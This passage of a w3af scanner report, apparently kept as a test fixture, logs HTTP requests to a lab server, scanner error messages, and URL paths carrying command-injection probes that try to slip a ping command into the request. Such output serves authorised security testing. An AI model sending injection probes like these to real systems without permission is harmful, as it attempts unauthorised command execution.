                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="1015">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%60ping+-c+4+localhost%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="1029">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/run+ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <error caller="threading">audit.rfi plugin needs to be correctly configured to use. Please set valid values for local address (eg. 10.5.2.5) and port (eg. 44449), or use the official w3af site as the target server for remote inclusions. The configuration error is: &quot;Listen address and port need to be configured&quot;</error>
    <error caller="threading">w3af won't be able to run plugin infrastructure.http_vs_https_dist. It seems that the user running the w3af process has not enough privileges.</error>
    <error caller="threading">A &quot;TypeError&quot; exception was found while running audit.un_ssl on &quot;Method: GET | http://domain:31337/&quot;. The exception was: &quot;__str__ returned non-string (type SysCallError)&quot; at connections.py:make_ssl_aware():149. The scan will continue but some vulnerabilities might not be identified.</error>
    <error caller="threading">A &quot;TypeError&quot; exception was found while running audit.un_ssl on &quot;Method: GET | http://domain:31337/post&quot;. The exception was: &quot;__str__ returned non-string (type SysCallError)&quot; at connections.py:make_ssl_aware():149. The scan will continue but some vulnerabilities might not be identified.</error>
    <error caller="threading">The allowed_methods plugin got an error while requesting &quot;http://10.12.68.43:31337/&quot;. Reason: &quot;Bad HTTP response status line: ''&quot;</error>
    <error caller="threading">The allowed_methods plugin got an error while requesting &quot;http://10.12.68.43:31337/&quot;. Reason: &quot;Bad HTTP response status line: ''&quot;</error>
    <error caller="threading">A &quot;TypeError&quot; exception was found while running audit.un_ssl on &quot;Method: POST | http://domain:31337/post | URL encoded form: (pseudo,message)&quot;. The exception was: &quot;__str__ returned non-string (type SysCallError)&quot; at connections.py:make_ssl_aware():149. The scan will continue but some vulnerabilities might not be identified.</error>
    <error caller="threading">The allowed_methods plugin got an error while requesting &quot;http://10.12.68.43:31337/&quot;. Reason: &quot;Bad HTTP response status line: ''&quot;</error>
</w3afrun>
"""
